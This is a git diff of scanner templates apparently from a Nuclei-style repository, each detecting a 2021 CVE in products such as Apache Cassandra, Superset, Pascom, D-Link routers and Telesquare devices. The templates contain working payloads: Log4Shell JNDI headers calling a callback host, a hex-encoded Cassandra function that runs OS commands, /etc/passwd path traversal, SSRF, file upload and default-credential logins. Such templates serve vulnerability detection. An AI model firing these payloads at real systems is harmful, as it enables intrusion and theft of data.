X-CSRF-Token: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xcsrftoken.{{interactsh-url}}} - X-Druid-Comment: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xdruidcomment.{{interactsh-url}}} - X-Forwarded-For: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xforwardedfor.{{interactsh-url}}} - X-Origin: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xorigin.{{interactsh-url}}} + Referer: ${${lower:n}${lower:d}i:${lower:rmi}://${hostName}.{{interactsh-url}}/poc} + X-Forwarded-For: ${${lower:n}${lower:d}i:${lower:rmi}://${hostName}.{{interactsh-url}}/poc} + Authentication: ${${lower:n}${lower:d}i:${lower:rmi}://${hostName}.{{interactsh-url}}/poc} + User-Agent: ${${lower:n}${lower:d}i:${lower:rmi}://${hostName}.{{interactsh-url}}/poc} + X-Api-Version: ${${lower:n}${lower:d}i:${lower:rmi}://${hostName}.{{interactsh-url}}/poc} + + + + + - stop-at-first-match: true matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the DNS Interaction + part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - type: regex part: interactsh_request regex: - - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' + - '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable extractors: - - type: kval - kval: - - - type: regex - group: 2 - regex: - - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' part: interactsh_request - - - type: regex group: 1 regex: - - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' - part: interactsh_request -# digest: 4a0a0047304502202884fb76d02d44ae24b3e9bc5914a20e89726f929f3a1472cb9ce81e16f6c7320221009fb4e79fd5e58f4a49ccbeff467c990c3be6e32a7e03a2af8db207849e937d5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output diff --git a/poc/cve/CVE-2021-44451.yaml b/poc/cve/CVE-2021-44451.yaml index 71a197e9fd..a67a59b2bd 100644 --- a/poc/cve/CVE-2021-44451.yaml +++ b/poc/cve/CVE-2021-44451.yaml @@ -1,59 +1,72 @@ id: CVE-2021-44451 + info: - name: Apache Superset Default Login + name: Apache Superset <=1.3.2 - Default Login author: dhiyaneshDK - severity: high - description: Apache Superset up to and including 1.3.2 allowed for registered database connections password leak for authenticated users. This information could be accessed in a non-trivial way. - remediation: Users should upgrade to Apache Superset 1.4.0 or higher. + severity: medium + description: | + Apache Superset through 1.3.2 contains a default login vulnerability via registered database connections for authenticated users. An attacker can obtain access to user accounts and thereby obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: Upgrade to Apache Superset 1.4.0 or higher. reference: - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json + - https://lists.apache.org/thread/xww1pccs2ckb5506wrf1v4lmxg198vkb - https://nvd.nist.gov/vuln/detail/CVE-2021-44451 - tags: apache, default-login classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.5 cve-id: CVE-2021-44451 -requests: + cwe-id: CWE-522 + epss-score: 0.00614 + epss-percentile: 0.76336 + cpe: cpe:2.3:a:apache:superset:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 3 + vendor: apache + product: superset + shodan-query: http.favicon.hash:1582430156 + tags: cve,cve2021,apache,superset,default-login + +http: - raw: - | GET /login/ HTTP/1.1 Host: {{Hostname}} - Origin: {{BaseURL}} - | POST /login/ HTTP/1.1 Host: {{Hostname}} - Origin: {{BaseURL}} Content-Type: application/x-www-form-urlencoded - Referer: {{BaseURL}}/admin/airflow/login csrf_token={{csrf_token}}&username={{username}}&password={{password}} - attack: pitchfork + - | + GET /dashboard/list/ HTTP/1.1 + Host: {{Hostname}} + payloads: username: - admin password: - admin - extractors: - - type: regex - name: csrf_token - group: 1 - part: body - internal: true - regex: - - 'value="(.*?)">' + attack: pitchfork + matchers-condition: and matchers: - type: word - part: body - condition: and + part: header_2 words: - - 'Redirecting...' - - '

Redirecting...' + - 'session' + - type: word - part: header + part: body_3 words: - - 'session' - - type: status - status: - - 302 + - 'DashboardFilterStateRestApi' -# Enhanced by mp on 2022/03/02 + extractors: + - type: regex + name: csrf_token + group: 1 + regex: + - 'name="csrf_token" type="hidden" value="(.*)"' + internal: true + part: body +# digest: 490a00463044022041de0dd6aa6d8640458b0bdc6402f1970f9cbc7b809bea89a3d19d33eefe722a02207c73590cdccce0af2ef7a36878ff85aeb663308dfcf4bdf2b9296acd541daec7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-44521.yaml b/poc/cve/CVE-2021-44521.yaml index 6b91463e9f..137b1ff0a7 100644 --- a/poc/cve/CVE-2021-44521.yaml +++ b/poc/cve/CVE-2021-44521.yaml @@ -1,4 +1,5 @@ id: CVE-2021-44521 + info: name: Apache Cassandra Load UDF RCE author: Y4er @@ -9,48 +10,65 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-44521 - https://jfrog.com/blog/cve-2021-44521-exploiting-apache-cassandra-user-defined-functions-for-remote-code-execution/ - https://lists.apache.org/thread/y4nb9s4co34j8hdfmrshyl09lokm7356 + - http://www.openwall.com/lists/oss-security/2022/02/11/4 + - https://thesecmaster.com/how-to-fix-apache-cassandra-rce-vulnerability-cve-2021-44521/ + remediation: 3.0.x users should upgrade to 3.0.26, 3.11.x users should upgrade to 3.11.12, 4.0.x users should upgrade to 4.0.2 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H cvss-score: 9.1 cve-id: CVE-2021-44521 - cwe-id: CWE-94 + cwe-id: CWE-732,CWE-94 + cpe: cpe:2.3:a:apache:cassandra:*:*:*:*:*:*:*:* + epss-score: 0.01212 + metadata: + max-request: 1 + product: cassandra + vendor: apache tags: cve,cve2021,network,rce,apache,cassandra -network: - - inputs: +tcp: + - host: + - "{{Hostname}}" + port: 9042 + + inputs: - data: "050000000500000000" - read: 1024 type: hex - - data: "0500000101000000530003000b4452495645525f4e414d450016446174615374617820507974686f6e20447269766572000e4452495645525f56455253494f4e0006332e32352e30000b43514c5f56455253494f4e0005332e342e35" read: 1024 + + - data: "0500000101000000530003000b4452495645525f4e414d450016446174615374617820507974686f6e20447269766572000e4452495645525f56455253494f4e0006332e32352e30000b43514c5f56455253494f4e0005332e342e35" type: hex - - data: "3e000218aeb50500000307000000350000001d64726f70204b455953504143452049462045584953545320746573743b0001000000340000006400080005d82cc8ca0e4fcdde8c0a" read: 1024 + + - data: "3e000218aeb50500000307000000350000001d64726f70204b455953504143452049462045584953545320746573743b0001000000340000006400080005d82cc8ca0e4fcdde8c0a" type: hex - - data: "7f0002a6a69f0500000407000000760000005e435245415445204b4559535041434520746573742057495448207265706c69636174696f6e203d207b27636c617373273a202753696d706c655374726174656779272c20277265706c69636174696f6e5f666163746f7227203a20317d3b0001000000340000006400080005d82cc8ca390f0ddce06b" read: 1024 + + - data: "7f0002a6a69f0500000407000000760000005e435245415445204b4559535041434520746573742057495448207265706c69636174696f6e203d207b27636c617373273a202753696d706c655374726174656779272c20277265706c69636174696f6e5f666163746f7227203a20317d3b0001000000340000006400080005d82cc8ca390f0ddce06b" type: hex - - data: "7d000296664f0500000807000000740000005c435245415445205441424c4520746573742e7263652028636d642076617263686172205052494d415259204b455929205749544820636f6d6d656e743d27496d706f7274616e742062696f6c6f676963616c207265636f726473273b0001000000340000006400080005d82cc8cb2fc161951510" read: 1024 + + - data: "7d000296664f0500000807000000740000005c435245415445205441424c4520746573742e7263652028636d642076617263686172205052494d415259204b455929205749544820636f6d6d656e743d27496d706f7274616e742062696f6c6f676963616c207265636f726473273b0001000000340000006400080005d82cc8cb2fc161951510" type: hex - - data: "1c030291ff34050000100700000313000002fb637265617465206f72207265706c6163652046554e4354494f4e20746573742e657865632820636d64207465787420290d0a2020202052455455524e53204e554c4c204f4e204e554c4c20494e5055540d0a2020202052455455524e5320746578740d0a202020204c414e4755414745206a6176617363726970740d0a2020202041532024240d0a202020207661722053797374656d203d204a6176612e7479706528226a6176612e6c616e672e53797374656d22293b53797374656d2e73657453656375726974794d616e61676572286e756c6c293b0d0a202020207661722065203d746869732e656e67696e652e666163746f72792e736372697074456e67696e652e6576616c2827766172206f736e616d65203d206a6176612e6c616e672e53797374656d2e67657450726f706572747928226f732e6e616d6522293b6f736e616d65203d206f736e616d652e746f4c6f7765724361736528293b7661722073706c6974203d206f736e616d652e73746172747357697468282277696e2229203f20222f6322203a20222d63223b76617220636d6450617468203d206f736e616d652e73746172747357697468282277696e2229203f2022636d6422203a202262617368223b76617220636f6d6d616e64203d2022272b636d642b27223b7661722073203d205b636d64506174682c2073706c69742c20636f6d6d616e645d3b70203d206a6176612e6c616e672e52756e74696d652e67657452756e74696d6528292e657865632873293b766172206272203d206e6577206a6176612e696f2e4275666665726564526561646572286e6577206a6176612e696f2e496e70757453747265616d52656164657228702e676574496e70757453747265616d282929293b766172207265733d22223b7768696c652028286c203d2062722e726561644c696e6528292920213d206e756c6c29207b202020207265732b3d6c3b7265732b3d6a6176612e6c616e672e53797374656d2e6c696e65536570617261746f7228293b7d27293b0d0a20202020653b0d0a2020202024243b0001000000340000006400080005d82cc8cc7ece89646c85" read: 1024 + + - data: "1c030291ff34050000100700000313000002fb637265617465206f72207265706c6163652046554e4354494f4e20746573742e657865632820636d64207465787420290d0a2020202052455455524e53204e554c4c204f4e204e554c4c20494e5055540d0a2020202052455455524e5320746578740d0a202020204c414e4755414745206a6176617363726970740d0a2020202041532024240d0a202020207661722053797374656d203d204a6176612e7479706528226a6176612e6c616e672e53797374656d22293b53797374656d2e73657453656375726974794d616e61676572286e756c6c293b0d0a202020207661722065203d746869732e656e67696e652e666163746f72792e736372697074456e67696e652e6576616c2827766172206f736e616d65203d206a6176612e6c616e672e53797374656d2e67657450726f706572747928226f732e6e616d6522293b6f736e616d65203d206f736e616d652e746f4c6f7765724361736528293b7661722073706c6974203d206f736e616d652e73746172747357697468282277696e2229203f20222f6322203a20222d63223b76617220636d6450617468203d206f736e616d652e73746172747357697468282277696e2229203f2022636d6422203a202262617368223b76617220636f6d6d616e64203d2022272b636d642b27223b7661722073203d205b636d64506174682c2073706c69742c20636f6d6d616e645d3b70203d206a6176612e6c616e672e52756e74696d652e67657452756e74696d6528292e657865632873293b766172206272203d206e6577206a6176612e696f2e4275666665726564526561646572286e6577206a6176612e696f2e496e70757453747265616d52656164657228702e676574496e70757453747265616d282929293b766172207265733d22223b7768696c652028286c203d2062722e726561644c696e6528292920213d206e756c6c29207b202020207265732b3d6c3b7265732b3d6a6176612e6c616e672e53797374656d2e6c696e65536570617261746f7228293b7d27293b0d0a20202020653b0d0a2020202024243b0001000000340000006400080005d82cc8cc7ece89646c85" type: hex - - data: "51000278033505000014070000004800000030696e7365727420696e746f20746573742e72636528636d64292076616c75657328276563686f2031323331323327293b0001000000340000006400080005d82cc8cd5b810ef0b16e" read: 1024 + + - data: "51000278033505000014070000004800000030696e7365727420696e746f20746573742e72636528636d64292076616c75657328276563686f2031323331323327293b0001000000340000006400080005d82cc8cd5b810ef0b16e" type: hex - - data: "450002bff1d805000015070000003c0000002473656c65637420746573742e6578656328636d64292066726f6d20746573742e7263653b0001000000340000006400080005d82cc8cd99d444271281" read: 1024 + + - data: "450002bff1d805000015070000003c0000002473656c65637420746573742e6578656328636d64292066726f6d20746573742e7263653b0001000000340000006400080005d82cc8cd99d444271281" type: hex + read: 1024 + - data: "3e000218aeb50500000307000000350000001d64726f70204b455953504143452049462045584953545320746573743b0001000000340000006400080005d82cc8ca0e4fcdde8c0a" type: hex read: 1024 - host: - - "{{Hostname}}" - - "{{Host}}:9042" matchers: - type: word part: raw words: - "123123" - -# Enhanced by mp on 2022/03/07 +# digest: 4a0a00473045022066ac296d5d1fd004ace89e39ecb2657d792ef93945cff6e3adeaca82d9b39faf022100b0320b6067d4643eea86c70dddfa01b432652dc53809a81204f7795cfbfa303c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-44528.yaml b/poc/cve/CVE-2021-44528.yaml index 52aea3dc60..6e9083cf52 100644 --- a/poc/cve/CVE-2021-44528.yaml +++ b/poc/cve/CVE-2021-44528.yaml @@ -1,35 +1,49 @@ id: CVE-2021-44528 + info: name: Open Redirect in Host Authorization Middleware author: geeknik severity: medium description: Specially crafted "X-Forwarded-Host" headers in combination with certain "allowed host" formats can cause the Host Authorization middleware in Action Pack to redirect users to a malicious website. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the Open Redirect vulnerability in the Host Authorization Middleware. reference: - https://seclists.org/oss-sec/2021/q4/att-160/7-0-host-authorzation-open-redirect.patch - https://nvd.nist.gov/vuln/detail/CVE-2021-44528 + - https://github.com/rails/rails/commit/0fccfb9a3097a9c4260c791f1a40b128517e7815 + - https://www.debian.org/security/2023/dsa-5372 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2021-44528 cwe-id: CWE-601 - tags: cve,cve2021,redirect -requests: + epss-score: 0.00087 + epss-percentile: 0.3627 + cpe: cpe:2.3:a:rubyonrails:rails:6.0.4.2:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: rubyonrails + product: rails + tags: seclists,cve,cve2021,redirect + +http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - X-Forwarded-Host: //example.com + X-Forwarded-Host: //interact.sh + matchers-condition: and matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 + - type: status status: - 301 - 302 - 307 - 308 - -# Enhanced by mp on 2022/02/28 +# digest: 4a0a00473045022100927ef487ce8525eb6bc6cbf4c8622cd0692dcd777d1f61e850e485a92bccace00220331e35cc76348e1302e955890a2baca3550d488ae9a8d9f171568805a9d92502:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-45428.yaml b/poc/cve/CVE-2021-45428.yaml index 2ba8ceec99..38efcc2a0b 100644 --- a/poc/cve/CVE-2021-45428.yaml +++ b/poc/cve/CVE-2021-45428.yaml @@ -1,10 +1,13 @@ id: CVE-2021-45428 + info: name: Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Upload author: gy741 severity: critical description: | TLR-2005KSH is affected by an incorrect access control vulnerability. THe PUT method is enabled so an attacker can upload arbitrary files including HTML and CGI formats. + remediation: | + Apply the latest security patch or update to a version that addresses the arbitrary file upload vulnerability. reference: - https://drive.google.com/file/d/1wM1SPOfB9mH2SES7cAmlysuI9fOpFB3F/view?usp=sharing - http://packetstormsecurity.com/files/167101/TLR-2005KSH-Arbitrary-File-Upload.html @@ -14,11 +17,18 @@ info: cvss-score: 9.8 cve-id: CVE-2021-45428 cwe-id: CWE-639 + epss-score: 0.08441 + epss-percentile: 0.93762 + cpe: cpe:2.3:o:telesquare:tlr-2005ksh_firmware:-:*:*:*:*:*:*:* metadata: + verified: true + max-request: 3 + vendor: telesquare + product: tlr-2005ksh_firmware shodan-query: http.html:"TLR-2005KSH" - verified: "true" - tags: cve,cve2021,telesquare,intrusive,fileupload -requests: + tags: cve,cve2021,telesquare,intrusive,fileupload,packetstorm + +http: - raw: - | GET /{{randstr}}.txt HTTP/1.1 @@ -31,7 +41,7 @@ requests: - | GET /{{randstr}}.txt HTTP/1.1 Host: {{Hostname}} - req-condition: true + matchers-condition: and matchers: - type: dsl @@ -39,5 +49,4 @@ requests: - 'status_code_1 == 404 && status_code_2 == 201' - 'contains(body_3, "CVE-2021-45428") && status_code_3 == 200' condition: and - -# Enhanced by mp on 2022/05/19 +# digest: 4a0a0047304502200785f1ed654c3001b4456f995af1987209ad67b355ce59ff4f04dfbdf73208910221009f914a6fa692d6e69743b66383fba182d469ac65bc0c89b22cbe4fca04e60278:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-45967.yaml b/poc/cve/CVE-2021-45967.yaml index 76555bb8ed..81cbcc59d8 100644 --- a/poc/cve/CVE-2021-45967.yaml +++ b/poc/cve/CVE-2021-45967.yaml @@ -1,43 +1,26 @@ id: CVE-2021-45967 - info: name: Pascom CPS Server-Side Request Forgery author: dwisiswant0 - severity: critical + severity: high description: Pascom versions before 7.20 packaged with Cloud Phone System contain a known server-side request forgery vulnerability. - remediation: | - Apply the latest security patches or updates provided by Pascom to fix the Server-Side Request Forgery vulnerability (CVE-2021-45967). reference: - https://kerbit.io/research/read/blog/4 - - https://www.pascom.net/doc/en/release-notes/ - - https://tutorialboy24.blogspot.com/2022/03/the-story-of-3-bugs-that-lead-to.html - - https://www.pascom.net/doc/en/release-notes/pascom19/ classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 cve-id: CVE-2021-45967 - cwe-id: CWE-22 - epss-score: 0.73933 - epss-percentile: 0.97814 - cpe: cpe:2.3:a:pascom_cloud_phone_system:*:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: pascom_cloud_phone_system tags: cve,cve2021,pascom,ssrf - -http: +requests: - method: GET path: - - "{{BaseURL}}/services/pluginscript/..;/..;/..;/getFavicon?host={{interactsh-url}}" - + - "{{BaseURL}}/services/pluginscript/..;/..;/..;/getFavicon?host={{interactsh-url}}" # Triple parent because endpoint access via backend (parent of index CMS) matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - - type: status status: - 200 -# digest: 490a004630440220736ad7ba9cd0702307414abe78b0d18e6040b4c8cf196dc83220ad0c5288b83f02207d20002d55fc32f0052297d7ded57e40ef437d0dae015dd7ba87e90f2e5deeeb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/03/28 diff --git a/poc/cve/CVE-2021-45968.yaml b/poc/cve/CVE-2021-45968.yaml index 9067ec9b3e..9b6be56383 100644 --- a/poc/cve/CVE-2021-45968.yaml +++ b/poc/cve/CVE-2021-45968.yaml @@ -1,46 +1,36 @@ id: CVE-2021-45968 - info: - name: Pascom CPS - Local File Inclusion + name: Pascom CPS Path Traversal author: dwisiswant0 severity: high description: | - Pascom packaged with Cloud Phone System (CPS) versions before 7.20 contain a known local file inclusion vulnerability. - remediation: | - Apply the latest security patches or updates provided by the vendor to fix the Local File Inclusion vulnerability in Pascom CPS. + Pascom version packaged with Cloud Phone System (CPS) + versions before 7.20 contains a known path traversal issue reference: - https://kerbit.io/research/read/blog/4 - https://www.pascom.net/doc/en/release-notes/ - https://tutorialboy24.blogspot.com/2022/03/the-story-of-3-bugs-that-lead-to.html - - https://nvd.nist.gov/vuln/detail/CVE-2021-45968 - - https://jivesoftware.com/platform/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-45968 - cwe-id: CWE-918 - epss-score: 0.01864 - epss-percentile: 0.87022 - cpe: cpe:2.3:a:jivesoftware:jive:-:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: jivesoftware - product: jive + cwe-id: CWE-22 tags: cve,cve2021,pascom,lfi - -http: +requests: - raw: - | GET /services/pluginscript/ HTTP/1.1 Host: {{Hostname}} + - | # Double parent to access CMS index GET /services/pluginscript/..;/..;/ HTTP/1.1 Host: {{Hostname}} + - | # Verifying CMS GET / HTTP/1.1 Host: {{Hostname}} - + req-condition: true matchers: - type: dsl dsl: - "status_code_2 != status_code_1" + - "contains(body_2, 'pascom GmbH & Co KG') || contains(body_3, 'pascom GmbH & Co KG')" # Verifying CMS condition: and -# digest: 4b0a00483046022100d621ee16b129bbaadc4568fbe3b7c0820d1afdd7dce5367981414eab60108e2c0221009a4c0db4d6ff239b688e3ed9594419635bce919b3fcddee3da1cf8679e13c655:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-46005.yaml b/poc/cve/CVE-2021-46005.yaml index f355cb8247..4e7759ce9c 100644 --- a/poc/cve/CVE-2021-46005.yaml +++ b/poc/cve/CVE-2021-46005.yaml @@ -1,31 +1,19 @@ id: CVE-2021-46005 - info: name: Sourcecodester Car Rental Management System 1.0 - Stored Cross-Site Scripting author: cckuailong severity: medium description: Sourcecodester Car Rental Management System 1.0 is vulnerable to cross-site scripting via the vehicalorcview parameter. - remediation: | - To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: - https://www.exploit-db.com/exploits/49546 - https://nvd.nist.gov/vuln/detail/CVE-2021-46005 - - https://www.sourcecodester.com/cc/14145/online-car-rental-system-using-phpmysql.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2021-46005 cwe-id: CWE-79 - epss-score: 0.00143 - epss-percentile: 0.50029 - cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* - metadata: - max-request: 3 - vendor: car_rental_management_system_project - product: car_rental_management_system - tags: sourcecodester,authenticated,edb,cve,cve2021,xss,intrusive - -http: + tags: cve,cve2021,xss,sourcecodester,authenticated +requests: - raw: - | POST /admin/ HTTP/1.1 @@ -100,20 +88,19 @@ http: - | GET / HTTP/1.1 Host: {{Hostname}} - + cookie-reuse: true matchers-condition: and matchers: - type: word part: body words: - - - + - "" - type: word part: header words: - text/html - - type: status status: - 200 -# digest: 490a004630440220502dc1617d55c09997409f2f2ed277fad50494089ed7c1f7fd8929984700782f0220383d3a2a240ee11993e6930e4cf893c8b3e2cee4bf0b82c6566a4854a265caef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/02/28 diff --git a/poc/cve/CVE-2021-46379.yaml b/poc/cve/CVE-2021-46379.yaml index 841a1a4f7f..270692bd08 100644 --- a/poc/cve/CVE-2021-46379.yaml +++ b/poc/cve/CVE-2021-46379.yaml @@ -5,8 +5,6 @@ info: author: 0x_Akoko severity: medium description: DLink DIR850 ET850-1.08TRb03 contains incorrect access control vulnerability in URL redirection, which can be used to mislead users to go to untrusted sites. - remediation: | - Apply the latest firmware update provided by D-Link to fix the open redirect vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-46379 - https://drive.google.com/file/d/1rrlwnIxSHEoO4SMAHRPKZSRzK5MwZQRf/view @@ -17,17 +15,11 @@ info: cvss-score: 6.1 cve-id: CVE-2021-46379 cwe-id: CWE-601 - epss-score: 0.00245 - epss-percentile: 0.6241 - cpe: cpe:2.3:o:dlink:dir-850l_firmware:1.08trb03:*:*:*:*:*:*:* metadata: - verified: true - max-request: 1 - vendor: dlink - product: dir-850l_firmware + verified: "true" tags: cve,cve2021,redirect,dlink,router -http: +requests: - method: GET path: - '{{BaseURL}}/boafrm/formWlanRedirect?redirect-url=http://interact.sh&wlan_id=1' @@ -36,5 +28,6 @@ http: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4b0a00483046022100e02d1cce2b989a2e4838c77be9e9a1edabe5eac068b4d992f1a81aea6218648d022100d9834374f4d1729bcc0ed92095d52f8a1d298226c3f495ee270c96d1c4283f36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + +# Enhanced by cs 06/22/2022 diff --git a/poc/cve/CVE-2021-46381.yaml b/poc/cve/CVE-2021-46381.yaml index 87de041334..db6eb200e6 100644 --- a/poc/cve/CVE-2021-46381.yaml +++ b/poc/cve/CVE-2021-46381.yaml @@ -1,40 +1,26 @@ id: CVE-2021-46381 - info: name: D-Link DAP-1620 - Local File Inclusion author: 0x_Akoko severity: high - description: D-Link DAP-1620 is susceptible to local file Inclusion due to path traversal that can lead to unauthorized internal files reading [/etc/passwd] and [/etc/shadow]. - remediation: | - Apply the latest firmware update provided by D-Link to fix the local file inclusion vulnerability. + description: Local File Inclusion due to path traversal in D-Link DAP-1620 leads to unauthorized internal files reading [/etc/passwd] and [/etc/shadow]. reference: - https://drive.google.com/drive/folders/19OP09msw8l7CJ622nkvnvnt7EKun1eCG?usp=sharing + - https://www.cvedetails.com/cve/CVE-2021-46381/ - https://www.dlink.com/en/security-bulletin/ - - https://nvd.nist.gov/vuln/detail/CVE-2021-46381 - - http://packetstormsecurity.com/files/167070/DLINK-DAP-1620-A1-1.01-Directory-Traversal.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-46381 cwe-id: CWE-22 - epss-score: 0.01734 - epss-percentile: 0.86477 - cpe: cpe:2.3:o:dlink:dap-1620_firmware:-:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: dlink - product: dap-1620_firmware - tags: lfi,router,packetstorm,cve,cve2021,dlink - -http: + tags: cve,cve2021,dlink,lfi +requests: - method: POST path: - "{{BaseURL}}/apply.cgi" - body: "action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_response_page=../../../../../../../../../../../../../../etc/passwd&log_pass=DummyPass&login_n=admin&login_name=DummyName&tkn=634855349&tmp_log_pass=DummyPass&tmp_log_pass_auth=DummyPass" matchers: - type: regex part: body regex: - "root:.*:0:0:" -# digest: 4b0a00483046022100b5179914ad77b2772694e394be5e966b20d789ebe6d28400fb0da1c3605bab30022100973df25cdce290736713b6c19b87117b340a8d42974e441821a82797cf2680fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-46417.yaml b/poc/cve/CVE-2021-46417.yaml index 44a73fc756..239cff14c0 100644 --- a/poc/cve/CVE-2021-46417.yaml +++ b/poc/cve/CVE-2021-46417.yaml @@ -1,10 +1,13 @@ id: CVE-2021-46417 + info: name: Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion author: For3stCo1d severity: high description: | Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 is susceptible to local file inclusion because of insecure handling of a download function that leads to disclosure of internal files due to path traversal with root privileges. + remediation: | + Apply the latest security patch or update provided by Franklin Fueling Systems to fix the LFI vulnerability. reference: - https://packetstormsecurity.com/files/166671/Franklin-Fueling-Systems-Colibri-Controller-Module-1.8.19.8580-Local-File-Inclusion.html - https://drive.google.com/drive/folders/1Yu4aVDdrgvs-F9jP3R8Cw7qo_TC7VB-R @@ -15,18 +18,25 @@ info: cvss-score: 7.5 cve-id: CVE-2021-46417 cwe-id: CWE-22 + epss-score: 0.66274 + epss-percentile: 0.97604 + cpe: cpe:2.3:o:franklinfueling:colibri_firmware:1.8.19.8580:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: franklinfueling + product: colibri_firmware shodan-query: http.html:"Franklin Fueling Systems" - verified: "true" - tags: cve,cve2021,franklinfueling,lfi -requests: + tags: packetstorm,cve,cve2021,franklinfueling,lfi + +http: - method: GET path: - "{{BaseURL}}/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password=" + matchers: - type: regex part: body regex: - "root:.*:0:0:" - -# Enhanced by mp on 2022/06/29 +# digest: 4a0a00473045022100a0e93b4401052e19fe162fff63f71f8455172af23a8cdf55b8c5089ab82a5f940220242bcd3cab212ed9cd1007e55230d12bf622f05bd842f946ceade22637d496ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-46422.yaml b/poc/cve/CVE-2021-46422.yaml index 9ebd55b6bf..b68600bd9f 100644 --- a/poc/cve/CVE-2021-46422.yaml +++ b/poc/cve/CVE-2021-46422.yaml @@ -1,40 +1,52 @@ id: CVE-2021-46422 + info: name: SDT-CW3B1 1.1.0 - OS Command Injection author: badboycxcc,prajiteshsingh severity: critical description: | Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication. + remediation: | + Upgrade to a patched version of SDT-CW3B1 or apply the vendor-supplied patch to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/50936 - https://drive.google.com/drive/folders/1YJlVlb4SlTEGONzIjiMwd2P7ucP_Pm7T? - https://nvd.nist.gov/vuln/detail/CVE-2021-46422 - https://drive.google.com/drive/folders/1YJlVlb4SlTEGONzIjiMwd2P7ucP_Pm7T?usp=sharing + - http://packetstormsecurity.com/files/167201/SDT-CW3B1-1.1.0-Command-Injection.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 